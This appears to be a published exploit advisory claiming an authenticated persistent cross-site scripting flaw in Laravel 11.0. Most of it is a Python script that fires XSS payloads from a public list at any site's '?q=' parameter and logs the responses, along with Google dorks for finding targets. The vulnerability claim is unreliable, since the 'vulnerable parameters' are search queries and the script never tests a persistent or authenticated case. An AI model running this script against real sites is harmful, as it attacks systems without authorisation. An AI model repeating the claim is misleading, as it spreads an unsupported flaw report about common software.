Laravel version 11.0 suffers from a cross site scripting vulnerability.
18c911de78fea14ce7c2b2016a2eed4ceae0df290d5eae7a1ebed85970fb75db
/*!
- # VULNERABILITY: Cross Site Scripting Laravel version 11.0
- # Authenticated Persistent XSS
- # GOOGLE DORK: inurl:.com/?q=
- # GOOGLE DORK: Site:.com/?q=
- # DATE: 2024-12-01
- # SECURITY RESEARCHER: E1.Coders
- # VENDOR: LARAVEL [https://laravel.com/ ]
- # SOFTWARE LINK: https://laravel.com/docs/11.x/installation
- # CVSS: AV:N/AC:L/PR:H/UI:N/S:C
- # CWE: CWE-79
- # download payload https://raw.githubusercontent.com/payloadbox/xss-payload-list/refs/heads/master/Intruder/xss-payload-list.txt
*/
### -- [ Info: ]
[i] A valid persistent XSS vulnerability was discovered in of the Laravel version 11.0 website.
[i] Vulnerable parameter(s): - inurl:.com/?q= [AND] Site:.com/?q=
### -- [ Impact: ]
[~] Malicious JavaScript code injections, the ability to combine attack vectors against the targeted system, which can lead to a complete compromise of the resource.
### -- [ EXPLOIT : ]
import requests
# Target URL
url = "https://TARGET.com/?q="
# Function to read payloads from a file
def read_payloads(filename="payloads.txt"):
try:
with open(filename, "r") as f:
payloads = [line.strip() for line in f]
return payloads
except FileNotFoundError:
print(f"Error: File '{filename}' not found.")
return []
# Function to perform the request
def xss_attack(url, payload):
full_url = url + payload
try:
response = requests.get(full_url)
return response.status_code, response.text # return status code and response text
except requests.exceptions.RequestException as e:
print(f"An error occurred during the request: {e}")
return None, None
# Main function to iterate over payloads and attack
def main():
payloads = read_payloads()
if not payloads:
return
results = []
for payload in payloads:
status_code, response_text = xss_attack(url, payload)
if status_code:
results.append({"payload": payload, "status_code": status_code, "response": response_text})
#Save results to a file (Example, you might need to adjust based on your desired output)
with open("attack_results.txt", "w") as f:
for result in results:
f.write(f"Payload: {result['payload']}\n")
f.write(f"Status Code: {result['status_code']}\n")
f.write(f"Response: {result['response']}\n\n")
if __name__ == "__main__":
main()
### -- [ Contacts: ]
[+] E-Mail: E1.Coders@Mail.Ru
[+] GitHub: @e1coders